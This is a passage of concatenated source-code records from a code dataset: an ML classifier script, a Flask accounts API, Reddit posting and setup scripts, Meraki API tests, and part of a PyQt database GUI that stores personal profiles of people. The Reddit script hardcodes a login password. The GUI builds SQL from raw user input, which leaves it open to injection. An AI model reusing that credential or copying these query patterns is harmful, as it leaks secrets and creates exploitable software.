time()\r\nclf.fit(features_train, labels_train)\r\npred = clf.predict(features_test)\r\nprint(\"training time:\", round(time()-t0, 3), \"s\")\r\n\r\nfrom sklearn.metrics import classification_report\r\ny_true = labels_test\r\ny_pred = pred\r\n#print(len(y_pred))\r\nlabels = ['0','1']\r\ntarget_names = ['class 0', 'class 1']\r\nprint(classification_report(y_true, y_pred, target_names=target_names, labels=labels))\r\nprint(\"------------------------------------------------------\")\r\n\r\n##Printing Metrics for Training and Testing\r\nprint(\"------------------------------------------------------\")\r\nprint(\"No. of Testing Features:\"+str(len(features_test)))\r\nprint(\"No. of Testing Features Label:\"+str(len(labels_test)))\r\nprint(\"No. of Training Features:\"+str(len(features_train)))\r\nprint(\"No. of Training Features Label:\"+str(len(labels_train)))\r\nprint(\"No. of Predicted Features:\"+str(len(pred)))\r\nprint(\"------------------------------------------------------\")\r\n\r\n\r\n##Getting feature data\r\n#importances = clf.feature_importances_\r\n#most_important = importances.argmax()\r\n#print(most_important)\r\n#print([(feature,key) for key,feature in enumerate(clf.feature_importances_) if feature >= 0.2])\r\n\r\n\r\n#############################################################\r\n#### Saving model METHOD 2###\r\n#from sklearn.externals import joblib\r\n#model_file = \"./createdModel/maxEntModel.pkl\"\r\n#joblib.dump(clf, model_file)\r\n#print(\"classifier saved!!!!!!\")\r\n#clf1 = joblib.load(model_file)\r\n#print(\"classifier loaded!!!!!\")\r\n#pred = clf.predict(features_test)\r\n#print(clf.score(features_test, labels_test))\r\n\r\n##Calculating Classifier Performance Metrics\r\nfrom sklearn.metrics import classification_report\r\ny_true = labels_test\r\ny_pred = pred\r\nlabels = ['0','1']\r\ntarget_names = ['class 0', 'class 1']\r\nprint(classification_report(y_true, y_pred, target_names=target_names, labels=labels))\r\nprint(\"------------------------------------------------------\")\r\n\r\nfrom vectorize_split_dataset import preprocessLine\r\narrayTest = []\r\n\r\ninputPath=\"../ValidationData/validate_start.txt\"\r\noutputPath=\"../ValidationData/validate_completed.txt\"\r\nprint(\"Labelling Data\")\r\n##Opening Text file\r\noutput_file = open(outputPath, \"w\")\r\nfp = open(inputPath, 'r')\r\nline = fp.readline()\r\nwhile line:\r\n #print(line)\r\n line = fp.readline()\r\n pLine = line.strip()\r\n if(pLine != \"\"):\r\n del arrayTest[:]\r\n arrayTest.append(pLine)\r\n features_tobelabelled = preprocessLine(arrayTest)\r\n producedLabel = clf.predict(features_tobelabelled)[0]\r\n #print(producedLabel)\r\n print(producedLabel+\"\\t\"+pLine)\r\n output_file.write(producedLabel+\"\\t\"+pLine+\"\\n\")\r\n #text_file.write(\"$$$$$\\n\")\r\n#end loop\r\nfp.close()\r\noutput_file.close()","sub_path":"RCAAnalysis1/Algorithms/ME1.py","file_name":"ME1.py","file_ext":"py","file_size_in_byte":4354,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"345513938","text":"from http import HTTPStatus\n\nfrom flask import request\nfrom flask_restful import Resource\n\nfrom project.extensions import mysql_db\n\n\nclass Accounts(Resource):\n @staticmethod\n def post():\n req = request.get_json()\n sql = \"INSERT INTO accounts (first_name, last_name, birth_date, biography, picture_id, email) VALUES (%s, %s, %s, %s, %s, %s)\"\n val = (req.get(\"first_name\"),\n req.get(\"last_name\"),\n req.get(\"birth_date\"),\n req.get(\"biography\"),\n req.get(\"picture_id\"),\n req.get(\"email\"))\n mycursor = mysql_db.cursor()\n mycursor.execute(sql, val)\n mysql_db.commit()\n return {'message': \"Account created successfully\"}, HTTPStatus.NO_CONTENT\n\n @staticmethod\n def get(account_id):\n mycursor = mysql_db.cursor()\n\n val = tuple(account_id)\n mycursor.execute(\"select * from accounts where id = %s\", val)\n result = mycursor.fetchone()\n\n return {\"result\": {\n \"id\": result[0],\n \"first_name\": result[1],\n \"last_name\": result[2],\n \"birth_date\": str(result[3]),\n \"biography\": result[4],\n \"picture_id\": result[5],\n \"email\": result[6],\n }}, HTTPStatus.OK\n\n @staticmethod\n def put(account_id):\n mycursor = mysql_db.cursor()\n\n req = request.get_json()\n val = (req.get(\"first_name\"),\n req.get(\"last_name\"),\n req.get(\"birth_date\"),\n req.get(\"biography\"),\n req.get(\"picture_id\"),\n req.get(\"email\"),\n account_id)\n sql = \"UPDATE accounts set first_name = %s, last_name = %s, birth_date = %s, biography = %s, picture_id = %s, email = %s where id = %s\"\n mycursor.execute(sql, val)\n\n mysql_db.commit()\n return {\"message\": \"account successfully updated\"}, HTTPStatus.NO_CONTENT\n","sub_path":"project/controllers/v1/accounts.py","file_name":"accounts.py","file_ext":"py","file_size_in_byte":1938,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"390714528","text":"def self_post():\n # submits self post to specified subreddit with post title and body\n # it will then return the short link for that post\n import praw\n user_agent = 'windows: timed poster: v.01 (by /u/evolvdone)'\n r = praw.Reddit(user_agent=user_agent)\n r.login('evolvdone', 'iAD^&rJjDe6q')\n link = r.submit(subreddit, post_title, text=post_body)\n return link\n\ndef db_loop():\n import sqlite3\n import datetime\n import time\n\n sqlite_file = 'app/reddit.db'\n db = sqlite3.connect(sqlite_file)\n c = db.cursor()\n loop = True\n\n while loop == True:\n # current_time = (datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M\"),)\n time.sleep(1) # slows things down a bit for no reason\n current_time = (\"2016-07-24 13:40\",)\n c.execute('SELECT id FROM reddit WHERE time_to_post=? AND posted=0 ',\n current_time)\n db_id = c.fetchall()\n\n for x in db_id:\n print(x)\n c.execute(\n 'SELECT post_title, post_body, subreddit FROM reddit WHERE id=?', x)\n post_data = c.fetchone()\n post_title = post_data[0]\n post_body = post_data[1]\n subreddit = post_data[2]\n submitted_link = self_post()\n print(submitted_link)\n c.execute('UPDATE reddit SET posted=1 WHERE id=?', x) # mark posted\n db.commit()\n\ndb_loop()\n\n\"\"\" What db_loop does:\nloop forever\n get current time\n irretarte though DB checking time column AND row not marked\n if time matches\n save ID #\n irretarte though saved ID #'s'\n post row via reddit_post function\n mark row as posted\n\"\"\"\n","sub_path":"db_loop.py","file_name":"db_loop.py","file_ext":"py","file_size_in_byte":1671,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"538092911","text":"import os\nfrom setuptools import find_packages, setup\nfrom yamdl import __version__\n\n\n# We use the README as the long_description\nreadme_path = os.path.join(os.path.dirname(__file__), \"README.rst\")\n\n\nsetup(\n name='yamdl',\n version=__version__,\n url='http://github.com/andrewgodwin/yamdl/',\n author='Andrew Godwin',\n author_email='andrew@aeracode.org',\n description='Flat-file model instances for Django',\n long_description=open(readme_path).read(),\n license='BSD',\n zip_safe=False,\n packages=find_packages(exclude=['tests']),\n include_package_data=True,\n install_requires=[\n 'Django>=1.11',\n 'pyyaml>=3.12',\n ],\n classifiers=[\n 'Development Status :: 4 - Beta',\n 'Environment :: Web Environment',\n 'Framework :: Django',\n 'Intended Audience :: Developers',\n 'License :: OSI Approved :: BSD License',\n 'Operating System :: OS Independent',\n 'Programming Language :: Python :: 3',\n 'Programming Language :: Python :: 3.4',\n 'Programming Language :: Python :: 3.5',\n 'Topic :: Internet :: WWW/HTTP',\n ],\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1132,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"548831442","text":"# -*- coding: utf-8 -*-\n# Copyright 2019 Ross Jacobs All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\"Test generated python scripts.\n\nPylint disable (invalid-name) pylint doesn't like the fact that unittest uses\ncamel case. As this is an external library, ignore this check.\n\"\"\"\nimport unittest\nimport json\n\nimport generated.meraki_api as api\n\nwith open('../_apikey') as myfile:\n APIKEY = myfile.read()\nwith open('../_vars.json') as myfile:\n VARS = json.load(myfile)\napi.HEADERS['X-Cisco-Meraki-API-Key'] = APIKEY\n# pylint: disable=C0103\n\n\nclass TestApigenDashboard(unittest.TestCase):\n \"\"\"Test Meraki Apigen for Dashboard.\"\"\"\n def setUp(self):\n self.maxDiff = None\n\n def test_get_orgs(self):\n \"\"\"Get the organizations as a list.\"\"\"\n org_data = api.get_orgs()\n print(org_data)\n self.assertListEqual(org_data, VARS['ORG_DATA'])\n\n def test_get_networks(self):\n \"\"\"Get networks as a list.\"\"\"\n network_data = api.get_networks_by_org_id(VARS['ORG_ID'])\n print(\"Network Data:\", network_data)\n self.assertListEqual(VARS['NETWORK_DATA'], network_data)\n\n def test_create_delete_networks(self):\n \"\"\"Create and delete networks, testing expected output along the way\"\"\"\n local_network_data = VARS['NEW_NETWORK_DATA']\n local_new_network = api.create_network_by_org_id(\n VARS['ORG_ID'], VARS['NEW_NETWORK_PARAMS'])\n new_network_id = local_new_network['id']\n # Set ID of the last network to the correct one based on new network.\n local_network_data[-1]['id'] = new_network_id\n remote_all_networks = api.get_networks_by_org_id(VARS['ORG_ID'])\n remote_new_network = remote_all_networks[-1]\n self.assertListEqual(remote_all_networks, local_network_data)\n self.assertDictEqual(remote_new_network, local_new_network)\n\n code = api.delete_network_by_network_id(new_network_id)\n self.assertEqual(code, 204)\n\n def test_update_update_networks(self):\n \"\"\"Change network and change back and verify changes.\"\"\"\n expected_updated_network = VARS['UPDATED_NETWORK_JSON']\n remote_updated_network = api.update_network_by_network_id(\n VARS['NETWORK_ID'], params={\"tags\": \" west \"})\n self.assertDictEqual(expected_updated_network, remote_updated_network)\n remote_updated_network = api.update_network_by_network_id(\n VARS['NETWORK_ID'], params={\"tags\": \"\"})\n expected_updated_network['tags'] = \"\"\n self.assertDictEqual(expected_updated_network, remote_updated_network)\n\n def test_delete_networks(self):\n \"\"\"Test deletion of networks (doubles as a network deletion utility)\n\n network_id='' should return 404.\n An actual network_id should return 204\n \"\"\"\n network_id = 'N_'\n code = api.delete_network_by_network_id(network_id)\n self.assertEqual(204, code)\n if network_id == 'N_':\n self.assertEqual(404, code)\n else:\n self.assertEqual(204, code)\n\n\nclass TestApigenAdmins(unittest.TestCase):\n \"\"\"Test Meraki Apigen for Admins.\"\"\"\n def setUp(self):\n self.maxDiff = None\n\n def test_get_admins(self):\n \"\"\"Get a list of admins and compare to expected.\"\"\"\n actual_admin_data = api.get_admins_by_org_id(VARS['ORG_ID'])\n # lastActive changes all the time. Delete it from the fetched data.\n for index, _ in enumerate(actual_admin_data):\n actual_admin_data[index]['lastActive'] = \"\"\n print(\"Expected Data:\", VARS['ADMIN_DATA'])\n print(\"Admin Data:\", actual_admin_data)\n self.assertListEqual(VARS['ADMIN_DATA'], actual_admin_data)\n\n def test_create_delete_admin(self):\n \"\"\"Create a new admin and then delete them.\n Note this new admin is not a verified admin. Verify admin data before\n and after each API call.\n \"\"\"\n # Load dicts from store so we can change them.\n expected_new_admin = VARS['NEW_ADMIN']\n expected_new_admin_data = VARS['NEW_ADMIN_DATA']\n new_admin = api.create_admin_by_org_id(VARS['ORG_ID'],\n expected_new_admin)\n new_admin_data = api.get_admins_by_org_id(VARS['ORG_ID'])\n # New administrators get new IDs, so add the new ID to local admin dict\n expected_new_admin['id'] = new_admin['id']\n # lastActive changes all the time. Delete it from the fetched data.\n for index, _ in enumerate(new_admin_data):\n new_admin_data[index]['lastActive'] = \"\"\n # New admin was last added to admin list.\n expected_new_admin_data[-1] = expected_new_admin\n self.assertDictEqual(expected_new_admin, new_admin)\n self.assertListEqual(expected_new_admin_data, new_admin_data)\n\n code = api.delete_admin_by_admin_id(VARS['ORG_ID'],\n expected_new_admin['id'])\n self.assertEqual(code, 204) # 204 is expected DELETE success.\n new_admin_data = api.get_admins_by_org_id(VARS['ORG_ID'])\n # lastActive changes all the time. Delete it from the fetched data.\n for index, _ in enumerate(new_admin_data):\n new_admin_data[index]['lastActive'] = \"\"\n self.assertListEqual(new_admin_data, VARS['ADMIN_DATA'])\n\n def test_delete_admin(self):\n \"\"\"Test deletion of networks (doubles as a network deletion utility)\n\n admin_id=0 should return 404. Real admin_id should return 204\"\"\"\n admin_id = 0\n code = api.delete_admin_by_admin_id(VARS['ORG_ID'], admin_id)\n if admin_id == 0:\n self.assertEqual(404, code)\n else:\n self.assertEqual(204, code)\n\n def test_delete_extra_admin(self):\n \"\"\"If there's one more admin than expected, delete them.\"\"\"\n actual_admin_data = api.get_admins_by_org_id(VARS['ORG_ID'])\n # lastActive changes all the time. Delete it from the fetched data.\n for index, _ in enumerate(actual_admin_data):\n actual_admin_data[index]['lastActive'] = \"\"\n actual_ids = [admin['id'] for admin in actual_admin_data]\n expected_ids = [admin['id'] for admin in VARS['ADMIN_DATA']]\n if actual_ids != expected_ids:\n diff_admin_id = list(set(actual_ids).difference(\n set(expected_ids)))[0]\n diff_admin_email = [admin['email'] for admin in actual_admin_data\n if admin['id'] == diff_admin_id][0]\n print(\"Deleting admin...\\nemail:\", diff_admin_email,\n \"\\nID:\", diff_admin_id)\n code = api.delete_admin_by_admin_id(VARS['ORG_ID'], diff_admin_id)\n print(\"Return code is \", code)\n else:\n print(\"No excess admins detected!\")\n","sub_path":"tests/toy_scripts/python_toy_script.py","file_name":"python_toy_script.py","file_ext":"py","file_size_in_byte":7321,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"643263555","text":"from SH4R1NG4N_UI import *\nfrom Dialog_ConnectDB import *\nfrom Dialog_Error import *\nfrom Dialog_ADDDB import *\nfrom Dialog_Notes import *\nfrom Dialog_Search import *\n\nfrom script_amaterasu import *\nfrom script_izanami import *\nfrom script_izanami import *\n\nimport threading\nimport itertools\nimport mysql.connector\nfrom mysql.connector import Error\n\nclass Database():\n\n\tlasts_commands = []\n\n\tdef __init__(self, command):\n\t\tglobal kill_switch\n\t\tself.command = command\n\t\tfiledb = open('configDB.txt', 'r')\n\t\tconfigDB = filedb.readline().split(';')\n\t\tfiledb.close()\n\t\ttry:\n\t\t\tself.con = mysql.connector.connect(user=configDB[0],password=configDB[1],host=configDB[2],database=configDB[3])\n\t\t\tself.cursor=self.con.cursor()\n\t\t\tprint(\"Connected to MySQL\")\n\t\t\tprint(\"Launching: \",command)\n\t\t\tkill_switch = 1\n\t\texcept Exception as err:\n\t\t\tkill_switch = 0\n\t\t\twindow.dialogError('[!] Error connecting to database: '+str(err))\n\n\n\tdef getName(self, command): # Shows the principal information on the interface by the clicked ID (person) in the table.\n\t\treturn self.run(command)\n\n\n\tdef showInfo(self, command, switch, id, window): # Shows all info of selected ID.\n\t\tif command == False: # The condition bring the opportunity of make two diferents alternatives.\n\t\t\ttable_rec = ['CELLPHONE', 'COMPUTER', 'NOTEBOOK', 'NETWORKS', 'RED'] \n\t\telse:\n\t\t\tself.cursor.execute(command)\n\t\t\ttable_rec = self.cursor.fetchall()\n\t\twindow.tableWidget.setRowCount(0)\n\t\tnull_values = 0\n\t\tfor table in table_rec:\n\t\t\tself.cursor.execute(\"DESC %s;\" % table)\n\t\t\trecords = self.cursor.fetchall()\n\t\t\tself.cursor.execute(\"SELECT * FROM %s WHERE \"%table + \"ID=%s;\"%id)\n\t\t\trecords2 = self.cursor.fetchall()\n\t\t\tA=0\n\t\t\tfor row, row2 in itertools.product(records, records2):\n\t\t\t\twindow.tableWidget.insertRow(A)\n\t\t\t\tif row2[A] == None: # Count the number of None tipe values, for percentage purposes.\n\t\t\t\t\tnull_values += 1 \n\t\t\t\tif switch == 'view':\n\t\t\t\t\twindow.tableWidget.setItem(A, 0, QtWidgets.QTableWidgetItem(str(row[0])))\n\t\t\t\t\twindow.tableWidget.setItem(A, 1, QtWidgets.QTableWidgetItem(str(row2[A])))\n\t\t\t\tA = A + 1\n\n\t\tempty = [' ',' ',' ',' ',' ',' ',' ',' ',' ',' ',' ',' ',' ']\n\t\twindow.tableWidget.setHorizontalHeaderLabels(empty) # Reset the empty labels.\n\t\treturn (null_values*100)/205-100\n\n\t\t\n\tdef addData(self, command): # Adds data to Database.\n\t\ttry:\n\t\t\tself.cursor.execute(command)\n\t\t\tself.con.commit()\n\t\texcept Exception as err:\n\t\t\twindow.dialogError('Error: '+str(err))\n\tdef run(self, command): # Calls the main funciton of the Database.\n\t\tif kill_switch == 1: # It's important to maintain the caught of exceptions on the __init__ func.\n\t\t\ttry:\n\t\t\t\tself.cursor.execute(command)\n\t\t\t\tresult = self.cursor.fetchall()\n\t\t\t\twindow.tableWidget.setRowCount(0)\n\t\t\t\tfor row_number, row_data in enumerate(result):\n\t\t\t\t\twindow.tableWidget.insertRow(row_number)\n\t\t\t\t\tfor colum_number, data in enumerate(row_data):\n\t\t\t\t\t\twindow.tableWidget.setItem(row_number, colum_number, QtWidgets.QTableWidgetItem(str(data)))\n\n\t\t\t\tempty = [' ',' ',' ',' ',' ',' ',' ',' ',' ',' ',' ',' ',' ']\n\t\t\t\twindow.tableWidget.setHorizontalHeaderLabels(empty) # Reset the empty labels.\n\t\t\t\twindow.tableWidget.setHorizontalHeaderLabels(self.cursor.column_names)\n\t\t\texcept Exception as err:\n\t\t\t\twindow.dialogError('Error: '+str(err))\n\t\t\ttry:\n\t\t\t\treturn window.tableWidget.item(0,0).text()\n\t\t\texcept:\n\t\t\t\tpass # Error empty information on table.\n\t\telse:\n\t\t\tpass\n\n\n\tdef __del__(self):\n\t\tself.cursor.close()\n\t\tself.con.close()\n\t\tprint('MySQL Connection closed.')\n\n\n# =====================================================================================================================================================\t#\n\nclass MainWindow(QtWidgets.QMainWindow, Ui_MainWindow):\n\tindex = 0\n\tdef __init__(self, *args, **kwargs):\n\t\tQtWidgets.QMainWindow.__init__(self, *args, **kwargs)\n\t\tself.setupUi(self)\n\t\tself.buttonLOAD.clicked.connect(self.dialogDB)\n\t\tself.buttonAMATERASU.clicked.connect(self.selectAMATERASU)\n\t\tself.buttonIZANAMI.clicked.connect(self.selectIZANAMI)\n\t\tself.buttonIZANAGI.clicked.connect(self.selectIZANAGI)\n\t\tself.buttonKAMUI.setEnabled(False)\n\t\tself.buttonKOTOAMATSUKAMI.setEnabled(False)\n\t\tself.buttonSUSANOO.setEnabled(False)\n\t\tself.buttonTSUKUYOMI.setEnabled(False)\n\t\tself.buttonQuery.clicked.connect(self.sendQuery)\n\t\tself.tableWidget.clicked.connect(self.viewData)\n\t\tself.buttonLOADSCRIPT.clicked.connect(self.loadScript)\n\t\tself.buttonSH1.clicked.connect(self.dialogNotes)\n\t\tself.buttonSH2.clicked.connect(self.showCustom)\n\t\tself.buttonSH3.clicked.connect(self.showAllTables)\n\t\tself.buttonADD.clicked.connect(self.addDB)\n\t\tself.buttonREFRESH.clicked.connect(self.refreshThread)\n\t\tself.verticalSlider_DATAFRAME.valueChanged.connect(self.slideFrames)\n\t\tself.buttonNEXT.clicked.connect(self.search)\n\t\tself.selectIZANAMI()\n\t\tself.refreshThread()\n\n\tdef search(self, results, href):\n\t\tSearcher = QtWidgets.QDialog()\n\t\tSearcher_UI = Ui_SEARCHBOX()\n\t\tSearcher_UI.setupUi(Searcher, results, href)\n\t\tSearcher.show()\n\t\tSearcher.exec_()\t\n\n\tdef refreshThread(self): # Shows the data of the frames on the start if the DB is setted and connected.\n\t\tself.buttonREFRESH.setEnabled(False)\n\t\tself.threads = []\n\t\ttry:\n\t\t\tfor i in range(1,11):\n\t\t\t\texec(\"hilo_{} = threading.Thread(name='hilo_frames_{}', target=self.refreshFrames, args=[{}])\".format(i,i,i)) # Calls refreshFrames.\n\t\t\t\texec(\"hilo_{}.start()\".format(i))\n\t\t\t\texec(\"self.threads.append(hilo_{})\".format(i))\n\t\texcept Exception as err:\n\t\t\tprint(err)\n\t\tfinally:\n\t\t\tfor thread in self.threads:\n\t\t\t\tthread.join()\n\t\t\tself.buttonREFRESH.setEnabled(True)\n\n\n\n\tdef refreshFrames(self, val): # Refresh the data cuantity in % showed on the frames.\n\t\tcommand = 'SHOW TABLES;'\n\t\tcall_db = Database(command)\n\t\tpercentage = call_db.showInfo(command, 'percentage', val, self)\n\t\tif percentage != -100.0:\n\t\t\taux = percentage/100\n\t\t\tresult = 0\n\t\t\tfor time in range(100): # Soft refresh, it's only a visual effect to make the app more cute.\n\t\t\t\tresult = result + aux\n\t\t\t\tsleep(0.008)\n\t\t\t\texec('self.progressDB_{}.setValue(abs(result))'.format(val))\n\t\telse:\n\t\t\tpass\n\n\n\tdef slideFrames(self): # Coordine the slider with the label to show the group of frames.\n\t\tsize = self.verticalSlider_DATAFRAME.value()\n\t\tif size < 92 and size > 0:\n\t\t\tself.labelDATAFRAME.setText(str(size)+' - '+str(size+9))\n\n\t\t\n\tdef addDB(self): # Open a dialog to add manually entrys to the Database.\n\t\tself.AddDbDialog = QtWidgets.QDialog()\n\t\tself.add_dialog_db = Ui_ADDDB()\n\t\tself.add_dialog_db.setupUi(self.AddDbDialog, self)\n\t\tself.AddDbDialog.show()\n\t\tself.AddDbDialog.exec_()\n\n\tdef dialogDB(self): # Open the dialog of database configurations\n\t\tself.DialogDBLoad = QtWidgets.QDialog()\n\t\tself.ui_dialog_db = Ui_Dialog()\n\t\tself.ui_dialog_db.setupUi(self.DialogDBLoad, self)\n\t\tself.DialogDBLoad.show()\n\t\tself.DialogDBLoad.exec_()\n\n\tdef dialogNotes(self): # Open a dialog with the notes of the selected ID.\n\t\tif self.lineFBID.text() != 'None':\n\t\t\tself.DialogNotes = QtWidgets.QDialog()\n\t\t\tself.ui_dialog_notes = Ui_DialogNotes()\n\t\t\tself.ui_dialog_notes.setupUi(self.DialogNotes, self)\n\t\t\tself.DialogNotes.show()\n\t\t\tself.DialogNotes.exec_()\n\t\telse:\n\t\t\tself.dialogError('Invalid FBID')\n\n\tdef dialogError(self, errorinfo): # Shows a error dialog.\n\t\terror = QtWidgets.QDialog()\n\t\terror_dialog = Ui_ErrorDialog()\n\t\terror_dialog.setupUi(error, errorinfo)\n\t\terror.show()\n\t\terror.exec_()\n\n\n\tdef addEntry(self, saved_labels, saved_texts, saved_data, group_names): # Adds manually data to Database.\n\t\tcontador = 0\n\t\tfor group_num, texts in enumerate(saved_texts): \n\t\t\tfor texts_num, text in enumerate(texts):\n\t\t\t\tif contador == 0:\n\t\t\t\t\tcatch_ID = text.toPlainText()\n\t\t\t\tprint(str(contador),': ',text)\n\t\t\t\tif saved_data[contador] == 'ID':\n\t\t\t\t\tif text.toPlainText() != '':\n\t\t\t\t\t\tcommand = \"INSERT INTO {} ({}) VALUES ({});\".format(group_names[group_num], saved_data[contador], text.toPlainText())\n\t\t\t\t\t\tself.call_db = Database(command)\n\t\t\t\t\t\tself.call_db.addData(command)\n\t\t\t\t\telse:\n\t\t\t\t\t\tcommand = \"INSERT INTO {} ({}) VALUES ({});\".format(group_names[group_num], saved_data[contador], catch_ID)\n\t\t\t\t\t\tself.call_db = Database(command)\n\t\t\t\t\t\tself.call_db.addData(command)\n\n\t\t\t\telse:\n\t\t\t\t\tif text.toPlainText() != '':\n\t\t\t\t\t\tcommand = \"UPDATE {} SET {} = {} WHERE ID = {};\".format(group_names[group_num], saved_data[contador], str(text.toPlainText()), catch_ID)\n\t\t\t\t\t\tself.call_db = Database(command)\n\t\t\t\t\t\tself.call_db.addData(command)\n\t\t\t\tcontador += 1\n\n\n\tdef connectDB(self, dialog, one, two, three, four): # Try to connect to DB, after that turns the light on, and call \"SHOW TABLES;\".\n\t\tfiledb = open('configDB.txt', 'w')\n\t\tfiledb.write(one+';'+two+';'+three+';'+four)\n\t\tfiledb.close()\n\t\tfiledb = open('configDB.txt', 'r')\n\t\tconfigDB = filedb.readline().split(';')\n\t\tfiledb.close()\n\t\ttry:\n\t\t\tmysql.connector.connect(user=configDB[0],password=configDB[1],host=configDB[2],database=configDB[3])\n\t\t\tdialog.buttonHELP.setIcon(dialog.icon2)\n\t\t\tself.refreshThread()\n\t\t\t\n\t\texcept Exception as err:\n\t\t\tMainWindow.dialogError(MainWindow, str(err))\n\t\tfinally:\n\t\t\tself.textDB.setPlainText('SHOW TABLES;')\n\t\t\tself.sendQuery('normal')\n\t\t\n\n\tdef sendQuery(self, type_q): # Send querys to the database.\n\t\tcommand = self.textDB.toPlainText()\n\t\tself.call_db = Database(command)\n\t\tself.call_db.run(command)\n\t\tif type_q != 'view':\n\t\t\tDatabase.lasts_commands.insert(0,command)\n\n\n\tdef loadScript(self): # Load the selected script.\n\t\tif self.groupBox.title() == 'SELECTED: script_amaterasu.py':\n\t\t\ttry:\n\t\t\t\thilo0 = threading.Thread(name='hilo_amaterasu',target=amaterasu, args=(self.textScript1.toPlainText(),self.textScript2.toPlainText(),self.textScript3.toPlainText(),self.textScript4.toPlainText()))\n\t\t\t\thilo0.start()\n\t\t\texcept Exception as err:\n\t\t\t\tself.dialogError('[!] Soup closed: '+str(err))\n\n\t\telif self.groupBox.title() == 'SELECTED: script_izanami.py':\n\t\t\ttry:\n\t\t\t\t#hilo1 = threading.Thread(name='hilo_izanami',target=izanami, args=(self.textScript1.toPlainText(),self.textScript2.toPlainText(),self.textScript3.toPlainText(),self.textScript4.toPlainText()+'.html', self))\n\t\t\t\t#hilo1.start()\n\t\t\t\tizanami(self.textScript1.toPlainText(),self.textScript2.toPlainText(),self.textScript3.toPlainText(),self.textScript4.toPlainText()+'.html', self)\n\t\t\texcept Exception as err:\n\t\t\t\tself.dialogError('[!] Driver closed: '+str(err))\n\t\t\t\tprint(err)\n\n\t\telif self.groupBox.title() == 'SELECTED: script_izanagi.py':\n\t\t\tprint('izanagi')\n\n\t\telif self.groupBox.title() == 'SELECTED: script_kamui.py':\n\t\t\tprint('kamui')\n\n\t\telif self.groupBox.title() == 'SELECTED: script_kotoamatsukami.py':\n\t\t\tprint('kotoamatsukami')\n\n\t\telif self.groupBox.title() == 'SELECTED: script_susanoo.py':\n\t\t\tprint('susanoo')\n\t\t\n\t\telif self.groupBox.title() == 'SELECTED: script_tsukuyomi.py':\n\t\t\tprint('tsukuyomi')\n\n\n\tdef viewData(self): # Shows in the interface the information of a selected ID (person) when you click on the table.\n\t\trow = self.tableWidget.currentRow()\n\t\ttry:\n\t\t\tgetid = self.tableWidget.item(row,0).text()\n\t\t\tself.lcdd.display(int(getid))\n\t\t\tself.lineName.setText(str(Database(('SELECT NAME FROM GENERAL WHERE ID={};'.format(int(getid)))).getName('SELECT NAME FROM GENERAL WHERE ID={};'.format(int(getid))))+' '+\n\t\t\t\t\t\t\t\tstr(Database(('SELECT LASTNAME FROM GENERAL WHERE ID={};'.format(int(getid)))).getName('SELECT LASTNAME FROM GENERAL WHERE ID={};'.format(int(getid)))))\n\t\t\tself.lineDNI.setText(str(Database(('SELECT DNI FROM GENERAL WHERE ID={};'.format(int(getid)))).getName('SELECT DNI FROM GENERAL WHERE ID={};'.format(int(getid)))))\n\t\t\tself.lineBirthdate.setText(str(Database(('SELECT BORN_DATE FROM GENERAL WHERE ID={};'.format(int(getid)))).getName('SELECT BORN_DATE FROM GENERAL WHERE ID={};'.format(int(getid)))))\n\t\t\tself.lineCountry.setText(str(Database(('SELECT NATIONALITY FROM GENERAL WHERE ID={};'.format(int(getid)))).getName('SELECT NATIONALITY FROM GENERAL WHERE ID={};'.format(int(getid)))))\n\t\t\tself.lineFBID.setText(str(Database(('SELECT FaceID FROM GENERAL WHERE ID={};'.format(int(getid)))).getName('SELECT FaceID FROM GENERAL WHERE ID={};'.format(int(getid)))))\n\t\t\t\n\t\t\tid_number = window.lcdd.value()\n\t\t\tcommand = 'SHOW TABLES;'\n\t\t\tcall_db = Database(command)\n\t\t\tpercent = call_db.showInfo(command, 'view', id_number, self)\n\t\t\tprint(abs(percent),' %')\n\t\t\tself.progressBar.setValue(abs(percent))\n\n\t\t\tcommand = self.textDB.toPlainText()\n\t\t\tcall_db = Database(command)\n\t\t\tcall_db.run(command)\n\t\texcept:\n\t\t\tpass\n\n\n\tdef showAllTables(self): # Shows all info of selected ID.\n\t\tid_number = window.lcdd.value()\n\t\tcommand = 'SHOW TABLES;'\n\t\tcall_db = Database(command)\n\t\tpercentage = call_db.showInfo(command, 'view', id_number, self)\n\t\tprint(abs(percentage),' %')\n\t\tself.progressBar.setValue(abs(percentage))\n\n\n\tdef showCustom(self): # Shows all info of selected ID.\n\t\tid_number = window.lcdd.value()\n\t\tcommand = False\n\t\tcall_db = Database(command)\n\t\tcall_db.showInfo(command, 'view', id_number, self)\n\n\n\tdef keyPressEvent(self, event):\n\t\tif event.key() == Qt.Key_Q and event.modifiers() & Qt.ControlModifier:\n\t\t\tself.viewBack()\n\n\t\telif event.key() == Qt.Key_W and event.modifiers() & Qt.ControlModifier:\n\t\t\tself.viewNext()\n\n\n\tdef viewBack(self): # Load the previous command. (CTRL+Q)\n\t\tprint('Left pressed')\n\t\tif len(Database.lasts_commands) >= 2 and MainWindow.index < len(Database.lasts_commands)-1:\n\t\t\tMainWindow.index += 1\n\t\t\tprint(str(MainWindow.index))\t\n\t\t\tself.textDB.setPlainText(Database.lasts_commands[MainWindow.index])\n\t\t\tself.sendQuery('view')\n\n\n\tdef viewNext(self): # Load the previous command. (CTRL+W)\n\t\tprint('Right pressed')\n\t\tif len(Database.lasts_commands) >= 2 and MainWindow.index > 0:\n\t\t\tMainWindow.index -= 1\n\t\t\tprint(str(MainWindow.index))\n\t\t\tself.textDB.setPlainText(Database.lasts_commands[MainWindow.index])\n\t\t\tself.sendQuery('view')\n\n\tdef selectAMATERASU(self): # Shows the available settings and prepare the scripts when 